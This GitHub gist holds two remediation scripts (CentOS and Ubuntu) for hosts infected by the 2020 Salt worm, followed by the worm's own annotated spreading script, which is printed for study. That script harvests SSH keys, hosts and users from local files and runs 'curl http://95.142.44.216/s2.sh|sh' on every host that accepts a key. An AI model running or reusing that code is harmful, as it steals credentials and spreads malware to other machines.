
@daimon99
Last active May 7, 2020 07:06
salt 攻击病毒服务器修复脚本
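# CentOS remediation script for the Salt-worm infection. Run as root.
#
# Containment order: stop and disable the Salt units first so systemd cannot
# respawn what we kill, then kill leftovers, clean crontabs, replace every
# authorized_keys, and finally clear the worm's files in /tmp. Copies of the
# crontabs and /tmp files are kept in an evidence directory before anything
# is deleted, so a responder can still inspect them. This script removes only
# what this page lists; where possible, rebuild the host rather than trust it.
set -u

[ "$(id -u)" -eq 0 ] || { printf 'error: run this script as root\n' >&2; exit 1; }

# Public key that replaces every authorized_keys on the host. Replace the
# placeholder BEFORE running: with it unreplaced, every account would be
# locked out of SSH, so the script refuses to continue.
NEW_PUBKEY="<替换为你自己的新信任公钥>"
if [ "$NEW_PUBKEY" = "<替换为你自己的新信任公钥>" ]; then
  printf 'error: set NEW_PUBKEY to your new trusted public key first\n' >&2
  exit 2
fi

CRON_DIR=/var/spool/cron   # CentOS per-user crontab directory
# Evidence directory under /root (a constructed path), deliberately not under /tmp.
EVIDENCE_DIR=$(mktemp -d /root/salt-ir.XXXXXX) || exit 1
printf 'evidence will be copied to %s\n' "$EVIDENCE_DIR"

# 1) Stop and disable the Salt units. "stop" and "disable" are separate calls
#    on purpose: CentOS 7's systemd predates "disable --now". A unit may not
#    be installed, so failures here are ignored.
for unit in salt-minion salt-master; do
  systemctl stop "$unit" 2>/dev/null || true
  systemctl disable "$unit" 2>/dev/null || true
done

# 2) Kill any remaining process whose command line mentions "salt". Skip this
#    shell and its parent so a script path containing "salt" does not kill us.
#    (pgrep never reports itself, unlike the ps|grep pattern it replaces.)
# shellcheck disable=SC2046 -- word-splitting the PID list is intended
for pid in $(pgrep -f salt); do
  [ "$pid" = "$$" ] && continue
  [ "$pid" = "$PPID" ] && continue
  kill -9 "$pid" 2>/dev/null || true
done

# 3) Crontabs: keep a copy, then drop the wget/salt lines the worm added.
#    This also drops legitimate jobs mentioning wget or salt; review the
#    copies in the evidence directory afterwards.
for f in "$CRON_DIR"/*; do
  [ -f "$f" ] || continue
  cp -a -- "$f" "$EVIDENCE_DIR/"
  sed -i -e '/wget/d' -e '/salt/d' -- "$f"
done

# 4) Replace root's authorized_keys. /root is used explicitly rather than ~
#    because HOME may differ under sudo; the .ssh directory is recreated in
#    case it is missing.
install -d -m 700 /root/.ssh
printf '%s\n' "$NEW_PUBKEY" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

# 5) Same for every real account under /home. Directories without a matching
#    account are skipped; files are written as root and then chown'ed, which
#    avoids building a shell command string from the path.
for home in /home/*; do
  user=${home##*/}
  id "$user" >/dev/null 2>&1 || continue
  echo '--> delete authorized_keys for user' "$home"
  rm -f -- "$home/.ssh/authorized_keys"
  echo '-->' "$user"
  group=$(id -gn "$user")
  install -d -m 700 -o "$user" -g "$group" "$home/.ssh"
  printf '%s\n' "$NEW_PUBKEY" > "$home/.ssh/authorized_keys"
  chown "$user:$group" "$home/.ssh/authorized_keys"
  chmod 600 "$home/.ssh/authorized_keys"
done

# 6) Worm files in /tmp: preserve a copy, then remove (directories included).
for f in /tmp/sal*; do
  [ -e "$f" ] || continue
  cp -a -- "$f" "$EVIDENCE_DIR/"
  rm -rf -- "$f"
done

# ---- Verification ----
# 1) every authorized_keys now holds only the new public key
for f in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
  [ -f "$f" ] && { printf '== %s\n' "$f"; cat -- "$f"; }
done
# 2) no abnormal crontab entries remain
for f in "$CRON_DIR"/*; do
  [ -f "$f" ] && { printf '== %s\n' "$f"; cat -- "$f"; }
done
# 3) no worm files left in /tmp ("ll" is an interactive alias, not a command)
ls -l /tmp/sa* 2>/dev/null
# 4) no salt process left ("[s]alt" keeps grep from matching itself)
ps -elf | grep '[s]alt'
# The worm harvests SSH private keys, so every key and stored credential on
# this host (and on the hosts it could reach) must be treated as compromised
# and rotated; changing stored plaintext passwords everywhere is advised.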
# ====================
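# Ubuntu remediation script for the Salt-worm infection. Run as root.
#
# Containment order: stop and disable the Salt units first so systemd cannot
# respawn what we kill, then kill leftovers, clean crontabs, replace every
# authorized_keys, and finally clear the worm's files in /tmp. Copies of the
# crontabs and /tmp files are kept in an evidence directory before anything
# is deleted, so a responder can still inspect them. This script removes only
# what this page lists; where possible, rebuild the host rather than trust it.
set -u

[ "$(id -u)" -eq 0 ] || { printf 'error: run this script as root\n' >&2; exit 1; }

# Public key that replaces every authorized_keys on the host. Replace the
# placeholder BEFORE running: with it unreplaced, every account would be
# locked out of SSH, so the script refuses to continue.
NEW_PUBKEY="<替换为你自己的新信任公钥>"
if [ "$NEW_PUBKEY" = "<替换为你自己的新信任公钥>" ]; then
  printf 'error: set NEW_PUBKEY to your new trusted public key first\n' >&2
  exit 2
fi

CRON_DIR=/var/spool/cron/crontabs   # Ubuntu per-user crontab directory
# Evidence directory under /root (a constructed path), deliberately not under /tmp.
EVIDENCE_DIR=$(mktemp -d /root/salt-ir.XXXXXX) || exit 1
printf 'evidence will be copied to %s\n' "$EVIDENCE_DIR"

# 1) Stop and disable the Salt units. A unit may not be installed, so
#    failures here are ignored.
for unit in salt-minion salt-master; do
  systemctl stop "$unit" 2>/dev/null || true
  systemctl disable "$unit" 2>/dev/null || true
done

# 2) Kill any remaining process whose command line mentions "salt". Skip this
#    shell and its parent so a script path containing "salt" does not kill us.
#    (pgrep never reports itself, unlike the ps|grep pattern it replaces.)
# shellcheck disable=SC2046 -- word-splitting the PID list is intended
for pid in $(pgrep -f salt); do
  [ "$pid" = "$$" ] && continue
  [ "$pid" = "$PPID" ] && continue
  kill -9 "$pid" 2>/dev/null || true
done

# 3) Crontabs: keep a copy, then drop the wget/salt lines the worm added.
#    This also drops legitimate jobs mentioning wget or salt; review the
#    copies in the evidence directory afterwards. cp -a keeps the
#    user:crontab ownership these files carry on Ubuntu.
for f in "$CRON_DIR"/*; do
  [ -f "$f" ] || continue
  cp -a -- "$f" "$EVIDENCE_DIR/"
  sed -i -e '/wget/d' -e '/salt/d' -- "$f"
done

# 4) Replace root's authorized_keys. /root is used explicitly rather than ~
#    because HOME may differ under sudo; the .ssh directory is recreated in
#    case it is missing.
install -d -m 700 /root/.ssh
printf '%s\n' "$NEW_PUBKEY" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

# 5) Same for every real account under /home. Directories without a matching
#    account are skipped; files are written as root and then chown'ed, which
#    avoids building a shell command string from the path.
for home in /home/*; do
  user=${home##*/}
  id "$user" >/dev/null 2>&1 || continue
  echo '--> delete authorized_keys for user' "$home"
  rm -f -- "$home/.ssh/authorized_keys"
  echo '-->' "$user"
  group=$(id -gn "$user")
  install -d -m 700 -o "$user" -g "$group" "$home/.ssh"
  printf '%s\n' "$NEW_PUBKEY" > "$home/.ssh/authorized_keys"
  chown "$user:$group" "$home/.ssh/authorized_keys"
  chmod 600 "$home/.ssh/authorized_keys"
done

# 6) Worm files in /tmp: preserve a copy, then remove (directories included).
for f in /tmp/sal*; do
  [ -e "$f" ] || continue
  cp -a -- "$f" "$EVIDENCE_DIR/"
  rm -rf -- "$f"
done

# ---- Verification ----
# 1) every authorized_keys now holds only the new public key
for f in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
  [ -f "$f" ] && { printf '== %s\n' "$f"; cat -- "$f"; }
done
# 2) no abnormal crontab entries remain
for f in "$CRON_DIR"/*; do
  [ -f "$f" ] && { printf '== %s\n' "$f"; cat -- "$f"; }
done
# 3) no worm files left in /tmp ("ll" is an interactive alias, not a command)
ls -l /tmp/sa* 2>/dev/null
# 4) no salt process left ("[s]alt" keeps grep from matching itself)
ps -elf | grep '[s]alt'
# The worm harvests SSH private keys, so every key and stored credential on
# this host (and on the hosts it could reach) must be treated as compromised
# and rotated; changing stored plaintext passwords everywhere is advised.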
# 这是病毒通过入侵 salt 漏洞后,通过私钥进一步扩散传染的脚本。可以用来学习研究。
#!/bin/sh
#######################################
# Analyst annotation (defender's view). This is the worm's lateral-movement
# routine: it harvests SSH material and host/user names from the local box,
# then tries every (user, host, key, port) combination it found and has any
# host that accepts the key fetch and run the dropper. It takes no arguments
# and reads only local files and the process list.
# Artifacts a responder can look for on an infected host: an outbound curl
# to icanhazip.com, bursts of short-lived "ssh -oStrictHostKeyChecking=no
# -oBatchMode=yes" clients, a periodic "kill -9" of those clients, private
# key files whose mode was changed to 0400 (ctime updated), and the download
# host in the remote command string below.
#######################################
localgo() {
# This host's public IP; only used below to exclude itself from the
# /etc/hosts candidates.
myhostip=$(curl -sL icanhazip.com)
# Key candidates: id_rsa* files (minus *.pub) up to three levels under the
# home directories ...
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
# ... IdentityFile paths from ssh client configs ...
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
# ... the "-i <file>" argument of ssh/scp commands found in shell histories ...
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
# ... and any *.pem file under the same directories.
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
# Host candidates: HostName entries from ssh client configs,
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
# IPv4 literals on ssh/scp lines in shell histories,
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
# the part after '@' on those lines,
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
# IPv4 entries from /etc/hosts other than 0.0.0.0, loopback and this host's
# own public IP,
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
# IPv4 literals from known_hosts files (note the first glob is ~/*/.ssh,
# not ~/.ssh),
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
# and IPv4 literals taken from the current process list, filtered on ":22".
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
# Username candidates: "root" plus the third path component of every id_rsa
# path found under a .ssh directory (the login name for /home/<user>/.ssh/...),
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
)
# and the token before '@' on ssh/scp history lines (cp/mv/cd/nano lines dropped).
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
# Port candidates: 22 plus whatever followed "-p" on ssh/scp history lines.
pl=$(
echo "22"
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
)
# "nl | sort -u -k2 | sort -n | cut -f2-" de-duplicates each list while
# keeping first-seen order.
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
# Attempt counter: after every 20 attempts the loop sleeps 20 s and kills
# any ssh client still hanging, which is why the process-list shows bursts.
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
# Every candidate key file is touched: made readable, then locked to 0400
# (the mode ssh requires). This changes ctime on the victim's key files.
chmod +r $key
chmod 400 $key
# Each attempt is logged to stdout as "user@host key port".
echo "$user@$host $key $sshp"
# Two tries per combination, with and without sudo on the remote side.
# BatchMode=yes means key auth only (no password prompt), the host key is
# accepted blindly, and each connection is bounded by a 5 s timeout. A host
# that accepts the key downloads s2.sh from the listed address and pipes it
# into sh; that address and script name are the indicators to block/search.
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://95.142.44.216/s2.sh|sh; sudo wget -q -O - http://95.142.44.216/s2.sh|sh;"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://95.142.44.216/s2.sh|sh; wget -q -O - http://95.142.44.216/s2.sh|sh;"
done
done
done
done
}
# Invoked unconditionally at load time: executing (or sourcing) this file
# starts the harvest-and-spread routine with no arguments and no guard.
localgo

daimon99 commented May 7, 2020

水平有限,不完善的地方欢迎补充!
